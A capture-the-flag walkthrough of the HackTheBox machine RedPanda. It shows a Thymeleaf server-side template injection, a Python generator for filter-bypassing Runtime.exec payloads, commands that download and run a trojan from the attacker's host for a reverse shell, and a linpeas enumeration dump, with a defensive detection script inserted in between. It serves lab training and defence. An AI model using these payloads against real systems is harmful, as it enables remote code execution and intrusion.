HackTheBox -- RedPanda
Published: 2023/12/10
豆豆
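Contents
RedPanda
Information gathering
Scanning the target host's ports
Scanning web directories
Fingerprinting the website
Injection attack
Expressions in Thymeleaf
Writing a payload generator in Python
Reverse shell
Generating the trojan
Listening on port 443
Starting a local HTTP server with Python
Privilege escalation
Privilege-escalation enumeration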
RedPanda
Information gathering
Scanning the target host's ports

```
nmap -sTVC 10.10.11.170
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-11 11:36 EDT
Nmap scan report for 10.10.11.170
Host is up (0.45s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Red Panda Search | Made with Spring Boot
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.59 seconds
```

Ports 22 (ssh) and 8080 (http-proxy) are open.
Visit the site at 10.10.11.170:8080
Scanning web directories

```
dirsearch -u 10.10.11.170:8080

 _|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/8080_22-09-11_11-44-06.txt

Error Log: /root/.dirsearch/logs/errors-22-09-11_11-44-06.log

Target: http://10.10.11.170:8080/

[11:44:07] Starting:
[11:44:45] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[11:44:48] 400 - 435B - /a%5c.aspx
[11:45:36] 500 - 86B - /error
[11:45:36] 500 - 86B - /error/
[11:46:32] 405 - 117B - /search
[11:46:45] 200 - 987B - /stats/
[11:46:45] 200 - 987B - /stats

Task Completed
```

Two directories were found: /search (the initial page) and /stats
Visit 10.10.11.170:8080/stats
Fingerprinting the website

```
whatweb 10.10.11.170:8080
http://10.10.11.170:8080 [200 OK] Content-Language[en-US], Country[RESERVED][ZZ], HTML5, IP[10.10.11.170], Title[Red Panda Search | Made with Spring Boot]
```

- Made with Spring Boot
- Template engines commonly used with Spring Boot today include FreeMarker and Thymeleaf. Spring Boot uses Thymeleaf by default, and it is responsible for rendering the front-end pages.
Try a search in the search bar at 10.10.11.170:8080/stats (the default search, with nothing entered, is shown below)
- Greg is a hacker. Watch out for his injection attacks!
- This hints that we need to test for injection.
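Injection attack
- Common injection types include SQL injection, XSS, XPath injection, XML injection, code injection, command injection, SSTI, and so on.
- Many injection attempts failed; the SSTI attempt finally succeeded.
- SSTI here means Server-Side Template Injection. The vulnerability arises when the server receives malicious user input and, without any processing, uses it as part of the web application's template content. While compiling and rendering the template, the template engine executes the statements the user inserted to break the template, which can lead to sensitive information disclosure, code execution, getting a shell, and similar problems. The scope of the impact depends mainly on the complexity of the template engine.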
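Expressions in Thymeleaf
| Syntax | Name | Purpose |
| --- | --- | --- |
| ${...} | Variable Expressions | Reads the value of a context variable |
| *{...} | Selection Variable Expressions | Reads a property of the selected object |
| #{...} | Message Expressions | Internationalizes text messages |
| @{...} | Link URL Expressions | Expresses hyperlink addresses of all kinds |
| ~{...} | Fragment Expressions | References a shared code fragment |

When the ${...} and #{...} expressions are tried, the application reports that they are banned; the others are not filtered.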
Writing a payload generator in Python

```python
#!/usr/bin/python3

def main():
    command = input("please input command:")  # specify command

    # Convert every character of the command to its decimal code point
    convert = []
    for x in command:
        convert.append(str(ord(x)))

    # Rebuild the command inside the expression, one Character.toString(n) per character
    payload = "*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)" % convert[0]
    for i in convert[1:]:
        payload += ".concat(T(java.lang.Character).toString({}))".format(i)

    # Close exec(...) and read the process output back into the page
    payload += ").getInputStream())}"
    print(payload)


if __name__ == "__main__":
    main()
```

The payload it prints can be entered directly into the search box. user.txt is usually in a regular user's home directory:

```
python3 example.py
please input command:cat /home/woodenk/user.txt
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(110)).concat(T(java.lang.Character).toString(107)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(114)).concat(T(java.lang.Character).toString(46)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(116))).getInputStream())}
```

Search with it to get the user flag we need.
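Seen from the defending side, the payload shape above is easy to flag and decode in logged request bodies. The following is an added example, not code from the original post or from the target application: it checks form parameters for all five Thymeleaf expression openers, lists SpEL type references, and turns a Character.toString(n) chain back into the command it hides. The function names, the `name` parameter and the sample bodies are assumptions constructed for illustration, and the two-entry denylist only models the filter behaviour the post observed.

```python
import re
from urllib.parse import parse_qsl, urlencode

# All five Thymeleaf standard-expression openers from the table above.
EXPR_OPENERS = ("${", "*{", "#{", "@{", "~{")

# Model of the filter behaviour the post observed: only "${" and "#{" are rejected.
# Assumption: the application's real filter code is not shown on the page.
OBSERVED_DENYLIST = ("${", "#{")

# SpEL type reference such as T(java.lang.Runtime); the lookbehind avoids
# matching identifiers that merely end in "T".
TYPE_REF = re.compile(r"(?<![\w$])T\(\s*([A-Za-z_][\w.$]*)\s*\)")

# One link of the character chain the generator script emits:
# T(java.lang.Character).toString(99)
CHAR_LINK = re.compile(
    r"T\(\s*java\.lang\.Character\s*\)\s*\.\s*toString\(\s*(\d{1,7})\s*\)"
)

# Types that have no place in a search term (illustrative, not exhaustive).
HIGH_RISK_TYPES = {
    "java.lang.Runtime",
    "java.lang.ProcessBuilder",
    "java.lang.Class",
    "java.lang.ClassLoader",
}


def passes_observed_denylist(value):
    """True if the two-token denylist would let this value through."""
    return not any(token in value for token in OBSERVED_DENYLIST)


def decode_char_chain(value):
    """Join every Character.toString(n) link, in order, into the hidden string."""
    chars = []
    for match in CHAR_LINK.finditer(value):
        code_point = int(match.group(1))
        # Out-of-range numbers cannot be characters; mark them instead of failing.
        chars.append(chr(code_point) if code_point <= 0x10FFFF else "\ufffd")
    return "".join(chars)


def triage(body):
    """Inspect a urlencoded form body and return one finding per suspicious parameter."""
    findings = []
    for param, value in parse_qsl(body, keep_blank_values=True):
        openers = [opener for opener in EXPR_OPENERS if opener in value]
        types = sorted(set(TYPE_REF.findall(value)))
        if not openers and not types:
            continue
        decoded = decode_char_chain(value)
        high = bool(decoded) or bool(HIGH_RISK_TYPES.intersection(types))
        findings.append({
            "param": param,
            "openers": openers,
            "types": types,
            "decoded": decoded,
            "severity": "high" if high else "medium",
            "passes_observed_denylist": passes_observed_denylist(value),
        })
    return findings


# Constructed sample bodies (not captured traffic). The third follows the
# structure of the payload printed above, with the two-character command "id".
CHAIN = ("T(java.lang.Character).toString(105)"
         ".concat(T(java.lang.Character).toString(100))")
SAMPLES = [
    urlencode({"name": "greg"}),
    urlencode({"name": "${panda}"}),
    urlencode({"name": "*{T(org.apache.commons.io.IOUtils).toString("
                       "T(java.lang.Runtime).getRuntime().exec(" + CHAIN +
                       ").getInputStream())}"}),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        for finding in triage(sample):
            print(finding)
```

The third sample is the case that matters: the observed denylist lets it through because it only knows two of the five openers, while a check on every opener plus type references flags it and recovers the command for the incident record.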
Reverse shell
Generating the trojan
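Listening on port 443
Prepare to catch the reverse shell
Starting a local HTTP server with Python

```
# Use the SSTI injection to download the trojan from the local machine
wget 10.10.16.10:8000/kalakala.elf
# Give the trojan file execute permission
chmod +x kalakala.elf
# Run the trojan file
./kalakala.elf
```

The attacking machine successfully receives the reverse shell.
This target seems to clean up files on a schedule. In case the trojan was deleted and had to be uploaded again, I opened one more reverse shell.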
Privilege escalation
Privilege-escalation enumeration with linpeas.sh
(5s) gpg-connect-agent: connection to agent established ══╣ Some home ssh config file was found /usr/share/openssh/sshd_config Include /etc/ssh/sshd_config.d/*.conf ChallengeResponseAuthentication no UsePAM yes X11Forwarding yes PrintMotd no AcceptEnv LANG LC_* Subsystem sftp /usr/lib/openssh/sftp-server══╣ /etc/hosts.allow file found, trying to read the rules: /etc/hosts.allow Searching inside /etc/ssh/ssh_config for interesting info Include /etc/ssh/ssh_config.d/*.conf Host *SendEnv LANG LC_*HashKnownHosts yesGSSAPIAuthentication yes╔══════════╣ Analyzing PAM Auth Files (limit 70) drwxr-xr-x 2 root root 4096 Jun 14 14:35 /etc/pam.d -rw-r--r-- 1 root root 2133 Feb 26 2020 /etc/pam.d/sshd╔══════════╣ Searching tmux sessions ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions tmux 3.0a /tmp/tmux-1000 ╔══════════╣ Analyzing Keyring Files (limit 70) drwxr-xr-x 2 root root 4096 Jul 5 05:52 /usr/share/keyrings ╔══════════╣ Searching uncommon passwd files (splunk) passwd file: /etc/pam.d/passwd passwd file: /etc/passwd passwd file: /usr/share/bash-completion/completions/passwd passwd file: /usr/share/lintian/overrides/passwd╔══════════╣ Analyzing PGP-GPG Files (limit 70) /usr/bin/gpg netpgpkeys Not Found netpgp Not Found -rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg -rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg -rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg -rw-r--r-- 1 root root 3267 Jan 6 2021 /usr/share/gnupg/distsigkey.gpg -rw-r--r-- 1 root root 2247 Apr 1 13:27 /usr/share/keyrings/ubuntu-advantage-cc-eal.gpg -rw-r--r-- 1 root root 2274 Jan 25 2021 /usr/share/keyrings/ubuntu-advantage-cis.gpg -rw-r--r-- 1 root root 2236 Oct 15 2020 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg -rw-r--r-- 1 root root 2264 Oct 15 2020 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg -rw-r--r-- 1 root 
root 2275 Oct 15 2020 /usr/share/keyrings/ubuntu-advantage-fips.gpg -rw-r--r-- 1 root root 2250 Apr 15 14:10 /usr/share/keyrings/ubuntu-advantage-realtime-kernel.gpg -rw-r--r-- 1 root root 2235 Apr 1 13:27 /usr/share/keyrings/ubuntu-advantage-ros.gpg -rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg -rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg -rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg -rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg -rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg -rw-r--r-- 1 root root 2867 Feb 13 2020 /usr/share/popularity-contest/debian-popcon.gpg╔══════════╣ Analyzing Cache Vi Files (limit 70) -rw-r--r-- 1 root root 12288 Jun 20 14:05 /opt/panda_search/target/classes/static/css/.main.css.swp -rw-r--r-- 1 root root 12288 Apr 26 11:33 /opt/panda_search/target/classes/templates/.search.html.swp -rw-r--r-- 1 root root 12288 Apr 25 09:28 /opt/panda_search/target/classes/templates/.stats.html.swp╔══════════╣ Kubernetes information╔══════════╣ Analyzing Bind Files (limit 70) -rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind -rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind╔══════════╣ Analyzing Windows Files Files (limit 70) lrwxrwxrwx 1 root root 20 Jun 14 11:54 /etc/alternatives/my.cnf -> /etc/mysql/mysql.cnf lrwxrwxrwx 1 root root 24 Jun 14 11:54 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf -rw-r--r-- 1 root root 81 Jun 14 11:54 /var/lib/dpkg/alternatives/my.cnf╔══════════╣ Analyzing Other Interesting Files Files (limit 70) -rw-r--r-- 1 root root 3771 Feb 25 2020 /etc/skel/.bashrc -rw-r--r-- 1 woodenk woodenk 3938 Jun 14 12:37 /home/woodenk/.bashrc -rw-r--r-- 1 root root 807 Feb 25 2020 /etc/skel/.profile -rw-r--r-- 1 woodenk woodenk 807 Jun 14 11:12 
/home/woodenk/.profile╔═══════════════════╗ ═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════ ╚═══════════════════╝ ╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid strings Not Found -rwsr-xr-- 1 root messagebus 51K Apr 29 12:03 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 23K Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 463K Mar 30 13:03 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 55K Feb 7 2022 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 -rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable -rwsr-xr-x 1 root root 87K Mar 14 08:26 /usr/bin/gpasswd -rwsr-xr-x 1 root root 39K Feb 7 2022 /usr/bin/umount ---> BSD/Linux(08-1996) -rwsr-xr-x 1 root root 67K Mar 14 08:26 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) -rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount -rwsr-xr-x 1 root root 52K Mar 14 08:26 /usr/bin/chsh -rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwsr-xr-x 1 root root 84K Mar 14 08:26 /usr/bin/chfn ---> SuSE_9.3/10 -rwsr-xr-x 1 root root 44K Mar 14 08:26 /usr/bin/newgrp ---> HP-UX_10.20 -rwsr-xr-x 1 root root 67K Feb 7 2022 /usr/bin/su╔══════════╣ SGID ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid -rwxr-sr-x 1 root shadow 43K Sep 17 2021 /usr/sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root shadow 43K Sep 17 2021 /usr/sbin/unix_chkpwd -rwxr-sr-x 1 root utmp 15K Sep 30 2019 /usr/lib/x86_64-linux-gnu/utempter/utempter -rwxr-sr-x 1 root tty 35K Feb 7 2022 /usr/bin/wall -rwxr-sr-x 1 root ssh 343K Mar 30 13:03 /usr/bin/ssh-agent -rwxr-sr-x 1 root shadow 31K Mar 
14 08:26 /usr/bin/expiry -rwxr-sr-x 1 root tty 15K Mar 30 2020 /usr/bin/bsd-write -rwxr-sr-x 1 root shadow 83K Mar 14 08:26 /usr/bin/chage -rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwxr-sr-x 1 root crontab 43K Feb 13 2020 /usr/bin/crontab╔══════════╣ Checking misconfigurations of ld.so ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so /etc/ld.so.conf include /etc/ld.so.conf.d/*.conf/etc/ld.so.conf.d/etc/ld.so.conf.d/libc.conf /usr/local/lib/etc/ld.so.conf.d/x86_64-linux-gnu.conf /usr/local/lib/x86_64-linux-gnu /lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu╔══════════╣ Capabilities ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities Current capabilities: Current: = CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: 0000003fffffffff CapAmb: 0000000000000000Shell capabilities: 0x0000000000000000= CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: 0000003fffffffff CapAmb: 0000000000000000Files with capabilities (limited to 50): /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep /usr/bin/ping = cap_net_raw+ep /usr/bin/mtr-packet = cap_net_raw+ep /usr/bin/traceroute6.iputils = cap_net_raw+ep╔══════════╣ Users with capabilities ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities ╔══════════╣ Files with ACLs (limited to 50) ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls files with acls in searched folders Not Found ╔══════════╣ .sh files in path ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path /usr/bin/gettext.sh /usr/bin/rescan-scsi-bus.sh╔══════════╣ Unexpected in root /credits ╔══════════╣ Files (scripts) in /etc/profile.d/ ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files total 32 drwxr-xr-x 2 root root 4096 Jun 14 14:35 . 
drwxr-xr-x 105 root root 4096 Jul 5 05:52 .. -rw-r--r-- 1 root root 96 Dec 5 2019 01-locale-fix.sh -rw-r--r-- 1 root root 1557 Feb 17 2020 Z97-byobu.sh -rw-r--r-- 1 root root 729 Feb 2 2020 bash_completion.sh -rw-r--r-- 1 root root 1003 Aug 13 2019 cedilla-portuguese.sh -rw-r--r-- 1 root root 1107 Nov 3 2019 gawk.csh -rw-r--r-- 1 root root 757 Nov 3 2019 gawk.sh╔══════════╣ Permissions in init, init.d, systemd, and rc.d ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d ═╣ Hashes inside passwd file? ........... No ═╣ Writable passwd file? ................ No ═╣ Credentials in fstab/mtab? ........... No ═╣ Can I read shadow files? ............. No ═╣ Can I read shadow plists? ............ No ═╣ Can I write shadow plists? ........... No ═╣ Can I read opasswd file? ............. No ═╣ Can I write in network-scripts? ...... No ═╣ Can I read root folder? .............. No ╔══════════╣ Searching root files in home dirs (limit 30) /home/ /home/woodenk/.bash_history /home/woodenk/user.txt /root/╔══════════╣ Searching folders owned by me containing others files on it (limit 100) /home/woodenk ╔══════════╣ Readable files belonging to root and readable by me but not world readable -rw-r----- 1 root logs 422 Sep 12 10:42 /credits/damian_creds.xml -rw-r----- 1 root logs 426 Sep 12 10:54 /credits/woodenk_creds.xml -rw-r----- 1 root woodenk 33 Sep 12 09:01 /home/woodenk/user.txt╔══════════╣ Modified interesting files in the last 5mins (limit 100) /opt/panda_search/redpanda.log /tmp/hsperfdata_woodenk/883 /home/woodenk/.gnupg/pubring.kbx /home/woodenk/.gnupg/trustdb.gpg /var/log/syslog /var/log/journal/8e7b2e7692df48faa4e42d6cfc791ed2/system.journal /var/log/journal/8e7b2e7692df48faa4e42d6cfc791ed2/user-1000.journal /var/log/auth.log╔══════════╣ Writable log files (logrotten) (limit 100) ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation logrotate 3.14.0 Default mail command: /usr/bin/mailDefault compress 
command: /bin/gzipDefault uncompress command: /bin/gunzipDefault compress extension: .gzDefault state file path: /var/lib/logrotate/statusACL support: yesSELinux support: yes╔══════════╣ Files inside /home/woodenk (limit 20) total 796 drwxr-xr-x 6 woodenk woodenk 4096 Sep 12 11:32 . drwxr-xr-x 3 root root 4096 Jun 14 14:35 .. lrwxrwxrwx 1 root root 9 Jun 14 11:38 .bash_history -> /dev/null -rw-r--r-- 1 woodenk woodenk 220 Jun 14 11:12 .bash_logout -rw-r--r-- 1 woodenk woodenk 3938 Jun 14 12:37 .bashrc drwx------ 2 woodenk woodenk 4096 Jun 23 19:04 .cache drwx------ 3 woodenk logs 4096 Sep 12 11:32 .gnupg drwxrwxr-x 3 woodenk woodenk 4096 Jun 14 14:35 .local drwxrwxr-x 4 woodenk woodenk 4096 Jun 14 14:35 .m2 -rw-r--r-- 1 woodenk woodenk 807 Jun 14 11:12 .profile -rwxrw-r-- 1 woodenk logs 770491 Jul 1 10:40 linpeas.sh -rw-r----- 1 root woodenk 33 Sep 12 09:01 user.txt╔══════════╣ Files inside others home (limit 20)╔══════════╣ Searching installed mail applications╔══════════╣ Mails (limit 50)╔══════════╣ Backup folders╔══════════╣ Backup files (limited 100) -rw-r--r-- 1 root root 3696 Jun 20 15:58 /opt/credit-score/LogParser/final/pom.xml.bak -rwxr-xr-x 1 root root 226 Feb 17 2020 /usr/share/byobu/desktop/byobu.desktop.old -rw-r--r-- 1 root root 392817 Feb 9 2020 /usr/share/doc/manpages/Changes.old.gz -rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz -rw-r--r-- 1 root root 11886 Jun 14 12:58 /usr/share/info/dir.old -rw-r--r-- 1 root root 2756 Feb 13 2020 /usr/share/man/man8/vgcfgbackup.8.gz -rw-r--r-- 1 root root 0 Jun 15 13:13 /usr/src/linux-headers-5.4.0-121-generic/include/config/wm831x/backup.h -rw-r--r-- 1 root root 0 Jun 15 13:13 /usr/src/linux-headers-5.4.0-121-generic/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 237986 Jun 15 13:13 /usr/src/linux-headers-5.4.0-121-generic/.config.old -rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-121/tools/testing/selftests/net/tcp_fastopen_backup_key.sh 
-rw-r--r-- 1 root root 44048 Oct 12 2021 /usr/lib/x86_64-linux-gnu/open-vm-tools/plugins/vmsvc/libvmbackup.so -rw-r--r-- 1 root root 9833 Jun 15 13:13 /usr/lib/modules/5.4.0-121-generic/kernel/drivers/power/supply/wm831x_backup.ko -rw-r--r-- 1 root root 9073 Jun 15 13:13 /usr/lib/modules/5.4.0-121-generic/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 1802 Feb 15 2022 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py -rw-r--r-- 1 root root 1413 Jun 14 12:58 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc -rw-r--r-- 1 root root 39448 May 4 12:36 /usr/lib/mysql/plugin/component_mysqlbackup.so -rw-r--r-- 1 root root 2743 Apr 23 2020 /etc/apt/sources.list.curtin.old╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100) Found: /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001 Found: /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001 Found: /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20) -> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)-> Extracting tables from /var/lib/fwupd/pending.db (limit 20)╔══════════╣ Web files?(output limit)╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) -rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/static/.DS_Store -rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/static/img/.DS_Store -rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/.DS_Store -rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/templates/.DS_Store -rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/.DS_Store -rw-r--r-- 1 root root 2047 Apr 23 13:02 
/usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo -rw-r--r-- 1 woodenk woodenk 220 Jun 14 11:12 /home/woodenk/.bash_logout -rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout -rw------- 1 root root 0 Apr 23 2020 /etc/.pwd.lock -rw-r--r-- 1 root root 0 Jun 14 12:04 /etc/.java/.systemPrefs/.system.lock -rw-r--r-- 1 root root 0 Jun 14 12:04 /etc/.java/.systemPrefs/.systemRootModFile -rw-r--r-- 1 landscape landscape 0 Apr 23 2020 /var/lib/landscape/.cleanup.user -rw-r--r-- 1 root root 0 Sep 12 09:01 /run/network/.ifstate.lock╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70) -rwxrwxr-x 1 woodenk logs 765823 Sep 12 11:29 /tmp/hsperfdata_woodenk/linpeas.sh -rw------- 1 woodenk logs 32768 Sep 12 11:32 /tmp/hsperfdata_woodenk/883 -rw-r--r-- 1 root root 39509 Jul 5 05:52 /var/backups/apt.extended_states.0 -rw-r--r-- 1 root root 4206 Jun 14 14:30 /var/backups/apt.extended_states.1.gz -rw-r--r-- 1 root root 677272 Jun 14 14:30 /var/backups/dpkg.status.0 -rw-r--r-- 1 root root 268 May 7 2020 /var/backups/dpkg.diversions.0 -rw-r--r-- 1 root root 81920 Jun 17 06:25 /var/backups/alternatives.tar.0 -rw-r--r-- 1 root root 100 Apr 23 2020 /var/backups/dpkg.statoverride.0╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files /dev/mqueue /dev/shm /home/woodenk /opt/panda_search/src/main/resources/static/css/panda.css /opt/panda_search/target/classes/static/css/panda.css /opt/panda_search/target/panda.css.map /run/lock /run/screen /tmp /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix /tmp/.font-unix #)You_can_write_even_more_files_inside_last_directory/tmp/hsperfdata_woodenk/883 /tmp/hsperfdata_woodenk/linpeas.sh /tmp/tmux-1000 /tmp/tomcat-docbase.8080.3786991954686091370 /tmp/tomcat.8080.1605307941942746866 /tmp/tomcat.8080.1605307941942746866/work 
/tmp/tomcat.8080.1605307941942746866/work/Tomcat /tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost /tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost/ROOT /var/crash /var/tmp╔══════════╣ Interesting GROUP writable files (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files Group logs: /opt/panda_search/redpanda.log /tmp/hsperfdata_woodenk/linpeas.sh /tmp/tomcat.8080.1605307941942746866/work /tmp/tomcat.8080.1605307941942746866/work/Tomcat /tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost /tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost/ROOT╔══════════╣ Searching passwords in history files╔══════════╣ Searching *password* or *credential* files in home (limit 70) /etc/pam.d/common-password /usr/bin/systemd-ask-password /usr/bin/systemd-tty-ask-password-agent /usr/lib/git-core/git-credential /usr/lib/git-core/git-credential-cache /usr/lib/git-core/git-credential-cache--daemon /usr/lib/git-core/git-credential-store#)There are more creds/passwds files in the previous parent folder/usr/lib/grub/i386-pc/password.mod /usr/lib/grub/i386-pc/password_pbkdf2.mod /usr/lib/mysql/plugin/component_validate_password.so /usr/lib/mysql/plugin/validate_password.so /usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc /usr/lib/python3/dist-packages/keyring/credentials.py /usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc /usr/lib/python3/dist-packages/launchpadlib/credentials.py /usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc /usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc 
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py /usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc /usr/lib/python3/dist-packages/twisted/cred/credentials.py /usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path /usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path /usr/lib/systemd/system/systemd-ask-password-console.path /usr/lib/systemd/system/systemd-ask-password-console.service /usr/lib/systemd/system/systemd-ask-password-plymouth.path /usr/lib/systemd/system/systemd-ask-password-plymouth.service#)There are more creds/passwds files in the previous parent folder/usr/share/doc/git/contrib/credential /usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c /usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c /usr/share/doc/git/contrib/credential/netrc/git-credential-netrc 